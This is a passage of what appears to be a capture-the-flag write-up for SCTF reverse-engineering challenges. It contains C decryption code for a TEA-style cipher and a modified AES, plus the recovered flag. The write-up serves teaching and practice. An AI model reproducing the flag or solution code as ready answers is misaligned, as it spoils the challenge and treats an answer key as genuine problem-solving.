4\xA2\xF4\x55\xBE\xBD\x21\x84\x79\xD5\x3C\x95\x32\x56\xAE\x02\x59\xEE\xCA\x23\xDF\x02\x28\x6B\xCC\xD2\x5F\xFA\x8A\x18\x54\x2F\x63\xBD\xC1\x56\x07\x33\xE5\x36\xF0\x74\xC5\xA1\x87\x56\xF3\x52\x8C\x3B\x24\x5E\xAE\x42\x71\x50\xF7\x7C\x02\xDC\xDA\x5C\x7A\xAA\x0E\x5C\x55\x61\xDE\xB5\x2C\x7A\x3F\x2E\x8D\x83\x15\x19\xF4\x91\x04\x51\xC8\x7C\x35\xC6\xBB\x3F\x9E\x22\x1E\x9E\x84\x71\x75\x39\xC3\x22\x28\x48\x72\xEF\x19\x3E\x69\xA0\xED\x59\x98\x91\x4E\xE4\x4D\x38\x06\x3B\xA4\x92\x31\x12\x2B\x0A\xB8\x1F\x58\x17\x7C\x9B\x27\x09\x1E\x05\xC7\x18\x2D\xEC\xBF\x61\x4A\x28\x1E\x75\xE9\xAE\xBE\xC7\xD3\x11\xA4\x1B\x38\x87\x7D\xCC\xC8\xD5\x1B\x6E\x5D\x8B\x73\x9D\x8E\xBC\xBE\x98\xF6\xA1\x6C\x39\x21\x23\x46\x7B\xCB\x20\x4E\x8B\x48\xA2\xCD\xD5\xEC\x5A\xAE\x52\xF9\xC6\xB8\xA0\x97\x78\x02\x39\x76\x0A\xC3\xF1\x78\x3F\x7D\x2C\x38\x44\xA8\x0C\x15\x61\x79\x61\x38\x4B\x1F\x4D\x40\x7E\x3
B\xA9\xF4\x1F\xCC\x3A\x49\xE0\x93\xA3\x90\xF4\xF7\xEB\xCA\x36\x3B\xB1\xDB\x53\x26\x35\x8B\x92\xEB\xC3\xFC\xB3\x76\x73\x76\x65\xF9\xDD\xC4\xF0\x55\xEE\xA3\xCE\x5C\xDA\xA1\xE7\x1F\xC2\xA4\x38\x2C\xE7\xE2\xDD\xA3\x96\x55\x79\xBF\xE4\x12\x2A\x4D\x55\xD1\xEE\x13\xF2\x1B\x17\x99\x0B\x4B\x6F\xC0\x2E\x92\x24\xBC\xAA\x38\x6E\x5A\x72\x44\x12\x54\x08\x04\xFD\xD3\xAC\x3F\x58\x48\xC4\x40\xB8\x9C\x51\xA7\x5A\xBB\x48\xAA\xA2\x4E\xC6\xEB\xB3\x50\x44\xA3\xD7\x10\x7A\x82\x9F\x57\xA2\x35\x68\x0E\x32\x14\xC7\x9B\x7D\x5D\x23\x15\x4D\x65\xD8\xFD\xDE\x41\x9B\xDE\x08\x86\xC1\x8D\xD0\x91\x8E\x16\xE3\xA0\x95\xBF\x6E\x82\x0A\x65\x28\x64\x0C\x74\xA6\xCC\x50\x84\xD9\x31\x08\x11\x53\x2C\xFB\xDC\x32\x8D\x46\x61\x25\x93\xAD\x46\xAD\x14\x24\x61\x9F\x5D\x77\xAC\x25\x1F\xDA\xAD\x22\x5A\xB3\xFA\xD7\xDB\x39\xA2\x8B\x3E\x51\x7B\x9F\xCC\x68\xC0\xC9\x8C\x92\xE9\xE1\xA9\xFC\x28\x59\xE4\x36\xC4\xD1\xCE\xCD\x5B\xF7\xAA\xC3\xAC\x05\xEB\x8B\xD4\x1E\x13\x52\xB7\x51\xFA\xD2\x26\xF8\xFB\x7D\xF5\x22\x8F\x21\x23\x9A\xB3\x2B\x5B\x7F\xD8\xBD\xD6\x22\xF4\xF6\x44\xEC\xC0\xB6\x9B\x0E\x48\xD9\x4C\x29\x71\x4A\xE0\xDD\x77\xCA\x93\x5E\x6A\x0B\xB8\xE9\xAA\xBA\xC1\x6D\xA1\x01\x8E\x87\x7E\xAB\x08\xD5\xC2\x72\xFB\x4C\xAF\x40\x45\x09\xA7\x91\xEA\x83\xE2\xCB\xDC\xF3\xCA\xC3\x65\x34\x61\x78\x3B\x81\x0B\x8D\xCD\xF2\x7A\x79\xB2\x04\x74\xAD\x35\x1F\xD0\xAA\x81\x6F\x3D\xE0\x5C\x1E\xBC\xD5\x84\x22\x0E\x27\x25\x05\x01\xD9\xF5\x74\xC2\xE6\xC6\xA1\x13\x72\xFF\x14\x51\xDE\xBE\x1D\xBA\xD2\x28\x94\xD4\xB1\x59\xB3\x3C\x38\x13\xD6\x9E\xFA\x60\x9C\x10\x8F\x33\x39\x91\x04\x6D\x92\x91\x14\x56\xBA\x60\xAF\xD7\xA2\x5A\x75\x94\x83\x2C\x51\x4A\xB5\x0A\xD9\x81\x34\x2A\x45\xCC\x79\xC8\x20\x7C\x7E\x4F\x3B\xEA\xE4\x5E\x38\x53\x4D\x26\x91\x32\xE6\xE2\xDA\x56\x07\x31\x3C\x48\x9E\xD4\xA0\xFF\xBB\xFB\x32\x03\x71\xC4\xD1\xDF\xC8\x89\xDF\x19\xC9\x9E\x92\x0F\x75\x6E\x64\x6E\xB7\x93\x1D\x42\x6C\x4B\xEA\x59\xFE\xD0\x42\xEE\x88\x69\x3B\x31\x36\xE5\xA1\xAA\x63\x15\x2C\xA0\x46\x35\x85\xEB\xC0\x87\xA9\x11\x66\x25\x39\x71\x95\x19\x2E\x7B\xA0\x38\x24\xA0\x25\x6B\x5E\xC
C\x16\x97\x59\x9D\x5D\x7E\x45\x24\xAA\x57\xC7\xD3\x86\x02\xE7\xE8\xCC\x7B\x6D\x03\xB0\x65\x51\xE5\xA9\x86\x6A\x57\xE7\x6E\x8E\x1B\x3C\x56\xDE\x20\x1B\xFE\xF1\xD6\x3A\x00\x09\x4A\x66\xF0\xCC\xC3\x4A\x5B\x80\x10\x58\xF6\xB8\x66\x8F\x6B\x63\x19\x8B\xC3\xF5\x3C\xF4\x4B\xD5\x38\xB6\xE0\x3F\x7D\x7F\x66\xEF\x2E\xCE\xBE\x4F\xD5\xAD\x82\x18\x2F\x43\x91\x7C\xEF\x65\x79\xBD\xDF\xA3\x18\x4A\x96\x0C\x69\xF2\x19\x82\x12\x13\x40\x2A\x9C\x53\xCA\x68\xEE\x8D\x42\x28\x6A\xF9\xB8\x7B\x31\xCB\x6F\xE2\xA2\x04\x4C\x59\x5D\x32\xF2\xC0\xD8\x85\xEF\x1C\x9F\x76\xCA\xA0\x79\xAE\x1F\x67\x95\x4D\x62\xFC\x60\xBB\x37\xDB\x37\xE8\x29\xF5\x0B\xE5\x45\x5D\x38\xAC\xCD\x3A\xB8\xA2\xA1\xE4\xB7\x0E\x45\x16\x6F\xD1\x97\x4E\xAA\xC7\xBF\xCC\x49\x4E\x84\x77\x52\xA6\xD9\xEB\x1C\x14\x8A\x08\xB9\x6E\xEA\x0E\x69\xB5\x50\xD9\xAA\x32\xD5\x4D\x70\x92\x14\xE9\x2F\x55\x4A\xAC\x56\x9D\xD8\x02\xB5\xE5\x83\x11\x98\xA8\x5F\x80\x21\x53\x2D\xDD\x11\x11\x5C\xE3\xCA\xA5\x07\x19\x11\x11\x3A\xC7\xD2\xA3\xE3\x4D\xBB\xF3\x6D\xB4\xF2\x1C\xDE\xA5\x18\x8D\x17\x99\x91\xD8\xE3\xEC\x8E\x71\x9F\x9D\x10\xFD\xCF\xC5\x8E\xBC\x19\x52\x89\xE5\x3A\xF5\x0F\x45\xB4\x78\x4B\xC1\xFA\x16\xF3\xC2\xDF\x14\x2C\xD1\x5C\xA0\xFE\xCF\x78\x49\x60\xFB\xB3\x71\x1E\x75\xE9\x30\xC9\x97\xCC\x32\x1C\x11\x2D\x4C\x19\x26\x54\xA4\x65\xB7\x86\xE2\xC0\xE7\x46\xC1\x8B\xED\x27\x38\x32\x20\x84\x47\x4E\x2B\x1D\xA6\xB6\xEE\x09\x3D\xEF\xB4\xB7\x4E\x42\x37\xCD\x26\xE5\xB8\x8B\xE9\xEE\x4C\xAF\x28\xEF\xEF\xCA\xA3\x0A\x23\xF7\x45\x82\x2B\x50\x4D\x2D\xB3\x94\xBB\xD6\x82\xE9\xE8\xF3\x4E\x8B\x8A\x3E\x37\xB7\x14\x54\xB8\xA2\x47\x0D\x26\x17\xA4\x73\xCF\xD9\x40\x00\x6D\x43\x48\x24\xBF\x4D\xAF\x9D\x47\x97\x9F\x92\x48\x0D\x8F\x51\xAC\x42\x03\xB1\xDB\x9D\x68\x67\x3E\x45\xD8\x1E\x17\x89\xCF\xE8\x5E\xA4\x0D\x82\xB2\xED\x50\x06\x0C\xA0\xE4\xE7\x91\x1C\xE3\xD0\xCE\xAA\x47\x18\xD4\xA8\x68\x5D\x98\x46\xAC\x0F\xA8\x93\x3B\x1F\x06\xE4\x3F\xA9\xA4\xB0\x9C\xD4\x94\x02\x81\xD5\xC0\x40\xB4\xEF\xFA\x16\x64\xCD\x46\xF9\x6C\x25\x82\x9B\x83\x94\x73\x18\x32\x66\xA1\x0F\x7F\x99\x4E\x2F\x2E\x5A\x74\x6
8\xD8\x4D\x65\xDF\xA8\x8D\x6F\x67\xB7\x64\x9D\xB0\x2E\xFD\xA8\x90\xD6\x56\xC1\xD3\xD1\x35\x7E\x46\x38\x8F\x9C\xFD\xCF\xD6\x25\x7F\x01\xB0\xE9\x3C\x2A\xB9\x6A\x81\x08\xC5\xDE\x2E\xD1\x1E\x40\x93\xB9\x72\xE1\xC5\x7F\x4F\x47\x65\xA2\x87\x8E\xF3\x5F\x63\xA5\x60\x6F\x2C\xC1\x69\xA0\xB8\xAF\x4B\x32\x93\x81\x6F\x22\x24\x00\x3A\x60\xA6\x90\xDA\x71\x37\x3F\xC2\x14\xEF\x2A\x75\xF4\xD9\xB6\x5F\xCC\xDB\xBD\x44\x5E\x22\x56\x21\xE9\x32\x23\x0D\x62\x80\xDF\xA2\xAA\xEB\x77\xF6\x5D\xD6\x0E\x0A\xE0\xFD\xA9\xC1\x34\x8D\x49\xD1\x47\x1A\xC8\xEE\xCA\x11\xF5\xB5\x4C\xDF\x2B\x58\x7D\xAB\xCB\x17\x22\x05\x75\x28\xE8\xB6\x1F\x3F\x09\x1B\xD2\x20\x03\xB4\x0F\x51\x6F\x59\xBC\xF8\x47\xC1\x5D\xC8\x05\x86\xB8\x25\x1A\xEA\xA2\x09\x62\x0B\xB1\xDF\x8C\x2B\x81\xBD\x65\x7E\x14\x13\x16\xE2\xF6\x65\xA4\xC2\x93\x2C\xF8\x20\xE9\x48\x09\x74\xAC\x0A\x37\x09\xF0\xB0\xA1\x8A\x3E\x1E\x54\x02\x36\x4B\x70\x0C\xDC\x71\xAC\x7A\x7A\x76\xE7\xD8\x81\x7B\x55\x3E\xBC\xCA\x7F\xD0\xEC\x06\xD4\x4B\x99\xFB\xC3\x87\x83\x8D\x24\xF6\x3A\x65\x76\x58\x57\x0F\x88\xB2\x7F\xB4\xFD\xD0\x06\x93\xDA\x98\x67\x3C\x7B\xE7\x49\x02\x1D\x10\x5F\xFE\xE8\xD3\xCF\xAC\xF4\xB6\x57\xC5\x10\x3D\x1D\x7D\xF1\x5F\x83\x9C\x5C\x7D\x26\x81\x56\x36\xF2\xB6\x87\xB8\x48\x92\xA3\x8C\xA1\x66\x8A\x22\xBD\x14\x83\xB5\x9C\x99\xEE\xD3\xE7\xCA\xDE\x8F\x89\xAA\xE2\xFB\x51\x24\x81\x42\x2D\x1D\xC0\xC2\x9B\xFA\xD1\x89\x73\xDD\x0C\x18\xBC\xA9\xAC\x2C\x1F\x7E\x57\x86\x98\x99\xC9\x2C\x10\x82\x49\x4B\x61\x9C\x33\x17\xA2\x72\xDC\x5E\x72\x7B\x0B\xB7\x2D\x78\x19\x96\xCD\xB1\xA8\xE5\xA2\x0D\x09\xA4\x82\x3D\xAD\xC3\x58\x38\x0A\x49\x5F\x42\x4E\xF8\xFF\x6D\x23\x09\x52\xA3\x41\x51\x65\xDC\x1C\x10\x96\x31\xAF\x46\xB3\x90\x5C\x62\xC0\xB4\xF9\x05\x18\x31\x86\xC4\xA3\xAA\xF1\xE7\x16\xDC\xAA\xA9\x4C\xE5\x6D\x2C\xFF\xCE\xBB\x9A\xE8\x55\x51\x9B\xF7\x11\x52\x4B\x57\x51\x75\x2A\xF9\xDE\x67\xFC\x37\x8C\xF1\xBC\xD0\x33\xDC\x39\x2D\x0C\x03\x90\xB8\xEE\x68\x5E\x2C\x29\xB8\x8A\xBE\xC3\x80\x34\xCF\xE1\x7A\xB7\x73\x13\xE4\x0D\xCF\xAD\x6D\xA2\x7C\x16\xA5\x5D\xAB\xBE\x8E\xCD\xB0\x80\x04\x64\xB1\x7
3\x81\x46\x80\x00\xC4\xA9\x88\x5C\x9F\x77\x8F\x8E\x18\x26\x1F\xC5\x4F\xA0\x7C\xAD\x7E\xD5\x1F\x1B\xC5\xEF\x97\x4A\xAE\xDD\x55\xD8\xCF\x86\xE4\xAE\x78\x37\xE2\xFE\xA4\x89\x43\x38\x1C\xF0\x43\x62\x2B\xAC\x3E\xA0\x98\xE6\x85\xC3\xAF\xF8\xD4\x95\xA5\xFC\x9A\x8E\xEA\x98\xC8\x23\xCE\x13\x47\x78\xD1\x84\x96\xC8\xA0\xBC\x4C\x89\xF8\x08\x96\x14\xCA\x79\x0E\x04\x6F\x77\x8F\x5D\x21\x50\x15\x58";

// Undo the 16-round TEA-style transform on one 8-byte block, in place.
// data points at two 32-bit words (v0, v1). The round body has the shape of
// standard TEA decryption, but with 16 rounds.
void re_tea_buf2(unsigned int *data) {
    unsigned int sum = 0;
    unsigned int v0 = data[0];
    unsigned int v1 = data[1];
    // 128-bit key, hard-coded as four 32-bit words.
    unsigned int k0 = 0x11222233;
    unsigned int k1 = 0xAABBCCDD;
    unsigned int k2 = 0x1A2B3C4D;
    unsigned int k3 = 0xCC1122AA;
    unsigned int sums[16];
    unsigned int sums_idx = 0;
    // Rebuild the forward sum schedule. Subtracting 0x61c88647 is the same as
    // adding the TEA delta 0x9E3779B9 modulo 2^32; the loop stops at
    // 16 * delta (0xE3779B90), so sums[] holds delta*1 .. delta*16.
    do {
        sum -= 0x61c88647;
        sums[sums_idx++] = sum;
    } while (sum != -0x1c886470);
    // Walk the schedule backwards, undoing the v1 update before the v0 update.
    for (int i = 15; i >= 0; i--) {
        sum = sums[i];
        v1 -= ((v0 << 4) + k2) ^ (v0 + sum) ^ ((v0 >> 5) + k3);
        v0 -= ((v1 << 4) + k0) ^ (v1 + sum) ^ ((v1 >> 5) + k1);
    }
    data[0] = v0;
    data[1] = v1;
}

// Undo the 8-round transform on one 8-byte block of buffer 1, in place.
// Same key as re_tea_buf2. The rounds here are additive and the sum schedule
// (delta*0 .. delta*7) is walked from last to first.
// NOTE(review): presumably the binary applied the subtractive form of these
// rounds to this buffer; confirm against the disassembly.
void re_tea_buf1(unsigned int* data) {
    unsigned int v0 = data[0];
    unsigned int v1 = data[1];
    unsigned int k0 = 0x11222233;
    unsigned int k1 = 0xAABBCCDD;
    unsigned int k2 = 0x1A2B3C4D;
    unsigned int k3 = 0xCC1122AA;
    unsigned int sumlist[8] = { 0 };
    int idx = 0;
    unsigned int sum = 0;
    // sumlist[] records the sum *before* each increment, so it starts at 0.
    // The loop stops at 8 * delta (0xF1BBCDC8), i.e. after 8 entries.
    do {
        sumlist[idx] = sum;
        sum = sum + -0x61c88647;
        idx++;
    } while (sum != -0xe443238);
    for (int i = 7; i >= 0; i--) {
        sum = sumlist[i];
        // '+' and '*' bind tighter than '^', so each line XORs three sums:
        // (v + sum) ^ (v * 16 + key) ^ ((v >> 5) + key).
        v0 += (v1 + sum ^ v1 * 0x10 + k0 ^ (v1 >> 5) + k1);
        v1 += (v0 * 0x10 + k2 ^ (v0 >> 5) + k3 ^ v0 + sum);
    }
    data[0] = v0;
    data[1] = v1;
}

// Apply re_tea_buf2 to each of the 0x200 8-byte blocks of dst2 (0x1000 bytes).
void re_buf2() {
    for (int i = 0; i < 0x200; i++) {
        re_tea_buf2((unsigned int*)(dst2 + i * 8));
    }
}

// Apply re_tea_buf1 to each of the 0x200 8-byte blocks of dst1 (0x1000 bytes).
void re_buf1() {
    for (int i = 0; i < 0x200; i++) {
        re_tea_buf1((unsigned int*)(dst1 + i * 8));
    }
}

// Exchange the full 0x1000-byte contents of dst1 and dst2 through a stack
// temporary.
void swap_dst() {
    unsigned char tmp[0x1000];
    memcpy(tmp, dst1, 0x1000);
    memcpy(dst1, dst2, 0x1000);
    memcpy(dst2, tmp, 0x1000);
}

void swap_data(int i){ unsigned char tmp[0x100]; int rev_i = 
15 - i; memcpy(tmp, dst1 + rev_i * 0x100, 0x100); memcpy(dst1 + rev_i * 0x100, dst2 + i * 0x100, 0x100); memcpy(dst2 + i * 0x100, tmp, 0x100); } struct blockb { unsigned char data[0x80]; }; int main() { // return 0; for (int i = 15; i >= 0; i--) { swap_dst(); swap_data(i); re_buf1(); re_buf2(); } //printf("%x\n", dst1[0]); unsigned char flag[0x41] = { 0 }; unsigned int idx = 0; for (int i = 0; i < 0x20; i++) { blockb box[256] = { 0 }; for (ULONG64 i_1 = 0; i_1 < 256; i_1++) { ULONG64 pchar = i_1 + i; for (int j = 0; j < 0x80; j++) { pchar = (ULONG64)pchar * (ULONG64)0x41c64e6d + (ULONG64)0x3039; ULONG64 b = (pchar << 0x21) >> 0x31; box[i_1].data[j] = (unsigned char)b; } } for (int i_2 = 0; i_2 < 256; i_2++) { //if (dst2[0] == box[i].data[0]) { //printf("%x\n", i); //} if (!memcmp(dst2 + i * 0x80, box[i_2].data, 0x80)) { printf("%x\n", i_2); flag[idx++] = i_2; } } } for (int i = 0; i < 0x20; i++) { blockb box[256] = { 0 }; for (ULONG64 i_1 = 0; i_1 < 256; i_1++) { ULONG64 pchar = i_1 + i; for (int j = 0; j < 0x80; j++) { pchar = (ULONG64)pchar * (ULONG64)0x41c64e6d + (ULONG64)0x3039; ULONG64 b = (pchar << 0x21) >> 0x31; box[i_1].data[j] = (unsigned char)b; } } for (int i_2 = 0; i_2 < 256; i_2++) { //if (dst2[0] == box[i].data[0]) { //printf("%x\n", i); //} if (!memcmp(dst1 + i * 0x80, box[i_2].data, 0x80)) { printf("%x\n", i_2); flag[idx++] = i_2; } } } flag[0x40] = 0; printf("%s\n", flag); std::cout << "Hello World!\n"; } ``` Flag: `SCTF{xv6_nice_lab_6666_YOU_ARE_6666666_OrzzzzzzzzzzzzzrO_wowowo}` ### CplusExceptionEncrypt: 需要先下载mingw库才能运行这个exe 通过c++异常机制来实现加解密 实现了一个tea和魔改版的aes tea算法的catch位置在402C3C aes算法的catch位置在40209C x64dbg调试着逆就行 aes的行位移算法被修改过,逆运算直接复制粘贴ida里的就行 这种地方的rand是伪随机,模拟一遍就能爬出来 ![](https://i.imgur.com/mlwC30o.png) 解密脚本: ```cpp #include <iostream> unsigned char roundkeys[] = { 0x57, 0x65, 0x6C, 0x63, 0x6F, 0x6D, 0x65, 0x5F, 0x74, 0x6F, 0x5F, 0x73, 0x63, 0x74, 0x66, 0x21, 0xC4, 0x56, 0x91, 0x98, 0xAB, 0x3B, 0xF4, 0xC7, 0xDF, 0x54, 0xAB, 0xB4, 0xBC, 0x20, 0xCD, 
0x95, 0x71, 0xEB, 0xBB, 0xFD, 0xDA, 0xD0, 0x4F, 0x3A, 0x05, 0x84, 0xE4, 0x8E, 0xB9, 0xA4, 0x29, 0x1B, 0x3C, 0x4E, 0x14, 0xAB, 0xE6, 0x9E, 0x5B, 0x91, 0xE3, 0x1A, 0xBF, 0x1F, 0x5A, 0xBE, 0x96, 0x04, 0x9A, 0xDE, 0xE6, 0x15, 0x7C, 0x40, 0xBD, 0x84, 0x9F, 0x5A, 0x02, 0x9B, 0xC5, 0xE4, 0x94, 0x9F, 0xE3, 0xFC, 0x3D, 0xB3, 0x9F, 0xBC, 0x80, 0x37, 0x00, 0xE6, 0x82, 0xAC, 0xC5, 0x02, 0x16, 0x33, 0xB4, 0xBB, 0xFE, 0x15, 0x2B, 0x07, 0x7E, 0x22, 0x2B, 0xE1, 0xFC, 0x8E, 0xEE, 0xE3, 0xEA, 0xBD, 0xE5, 0x3C, 0x84, 0x3D, 0xCE, 0x3B, 0xFA, 0x1F, 0xE5, 0xDA, 0x06, 0x91, 0x0B, 0x39, 0xEC, 0x2C, 0x77, 0xF2, 0xF5, 0x16, 0xB9, 0xC9, 0x0F, 0x09, 0x5C, 0x13, 0x09, 0x98, 0x57, 0x2A, 0xE5, 0xB4, 0x89, 0x2B, 0x78, 0x4D, 0x30, 0xE2, 0x77, 0x44, 0x6C, 0xF1, 0x7E, 0xDC, 0x3B, 0xDB, 0x9B, 0x68, 0x06, 0x3F, 0x3D, 0xAF, 0x36, 0xDD, 0x4A, 0xEB, 0x5A, 0x2C, 0x34, 0x37, 0x61, 0xF7, 0xAF, 0x5F };; void AddRoundKeys(unsigned char* data, unsigned char* key) { for (int i = 0; i < 0x10; i++) { data[i] ^= key[i]; } } void SubBytes(unsigned char* plaintext, unsigned char* plaintextencrypt, int count)/*S盒置换*/ { unsigned int row, column; unsigned char Sbox[16][16] = { /* 0 1 2 3 4 5 6 7 8 9 a b c d e f */ /*0*/{ 0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76 }, /*1*/{ 0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0 }, /*2*/{ 0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15 }, /*3*/{ 0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a, 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75 }, /*4*/{ 0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84 }, /*5*/{ 0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b, 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf }, /*6*/{ 0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8 }, /*7*/{ 0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc, 0xb6, 0xda, 0x21, 0x10, 
0xff, 0xf3, 0xd2 }, /*8*/{ 0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17, 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73 }, /*9*/{ 0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb }, /*a*/{ 0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79 }, /*b*/{ 0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08 }, /*c*/{ 0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a }, /*d*/{ 0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e, 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e }, /*e*/{ 0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf }, /*f*/{ 0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16 } };// 填充Sbox矩阵 for (int i = 0; i < count; i++) { row = (plaintext[i] & 0xF0) >> 4; column = plaintext[i] & 0x0F; plaintextencrypt[i] = Sbox[row][column]; } } void SubBytesRe(unsigned char* plaintext, unsigned char* plaintextencrypt, int count)/*S盒逆置换*/ { unsigned int row, column; unsigned char Sbox[16][16] = { /* 0 1 2 3 4 5 6 7 8 9 a b c d e f */ {0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38, 0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb}, {0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87, 0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb}, {0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d, 0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e}, {0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2, 0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25}, {0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16, 0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92}, {0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda, 0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84}, {0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a, 0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06}, {0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02, 0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b}, {0x3a, 
0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea, 0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73}, {0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85, 0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e}, {0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89, 0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b}, {0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20, 0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4}, {0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31, 0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f}, {0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d, 0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef}, {0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0, 0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61}, {0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26, 0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d} }; // 填充Sbox矩阵 for (int i = 0; i < count; i++) { row = (plaintext[i] & 0xF0) >> 4; column = plaintext[i] & 0x0F; plaintextencrypt[i] = Sbox[row][column]; } } void ShiftRows(unsigned char* state)/*行移位*/ { unsigned char temp = 0; temp = state[1]; state[1] = state[5]; state[5] = state[9]; state[9] = state[13]; state[13] = temp; temp = state[2]; state[2] = state[10]; state[10] = temp; temp = state[6]; state[6] = state[14]; state[14] = temp; temp = state[15]; state[15] = state[11]; state[11] = state[7]; state[7] = state[3]; state[3] = temp; } void ShiftRowsRe(unsigned char* state)/*行移位的逆*/ { unsigned char temp = 0; temp = state[13]; state[13] = state[9]; state[9] = state[5]; state[5] = state[1]; state[1] = temp; temp = state[14]; state[14] = state[6]; state[6] = temp; temp = state[10]; state[10] = state[2]; state[2] = temp; temp = state[3]; state[3] = state[7]; state[7] = state[11]; state[11] = state[15]; state[15] = temp; } static uint8_t xtime(uint8_t x) { return ((x << 1) ^ (((x >> 7) & 1) * 0x1b)); } void MixColumns(unsigned char* text) { uint8_t i; uint8_t Tmp, Tm, t; for (i = 0; i < 4; ++i) { t = text[i * 4 + 0]; Tmp = text[i * 4 + 0] ^ text[i * 4 + 1] ^ text[i * 4 + 2] ^ text[i * 4 + 3]; Tm = text[i * 
4 + 0] ^ text[i * 4 + 1]; Tm = xtime(Tm); text[i * 4 + 0] ^= Tm ^ Tmp; Tm = text[i * 4 + 1] ^ text[i * 4 + 2]; Tm = xtime(Tm); text[i * 4 + 1] ^= Tm ^ Tmp; Tm = text[i * 4 + 2] ^ text[i * 4 + 3]; Tm = xtime(Tm); text[i * 4 + 2] ^= Tm ^ Tmp; Tm = text[i * 4 + 3] ^ t; Tm = xtime(Tm); text[i * 4 + 3] ^= Tm ^ Tmp; } return; }

// Multiply x by y in GF(2^8), built from repeated xtime() doublings.
// Only bits 0..4 of y are examined.
static uint8_t Multiply(uint8_t x, uint8_t y)
{
    return (((y & 1) * x) ^
        ((y >> 1 & 1) * xtime(x)) ^
        ((y >> 2 & 1) * xtime(xtime(x))) ^
        ((y >> 3 & 1) * xtime(xtime(xtime(x)))) ^
        ((y >> 4 & 1) * xtime(xtime(xtime(xtime(x)))))); /* this last call to xtime() can be omitted */
}

// Inverse MixColumns: each group of four consecutive bytes text[4i..4i+3] is
// replaced in place, using the coefficients 0x0e, 0x0b, 0x0d, 0x09.
void MixColumnsRe(unsigned char* text)
{
    int i;
    uint8_t a, b, c, d;
    for (i = 0; i < 4; ++i)
    {
        // Snapshot the column first; the four outputs all use the old values.
        a = text[i * 4 + 0];
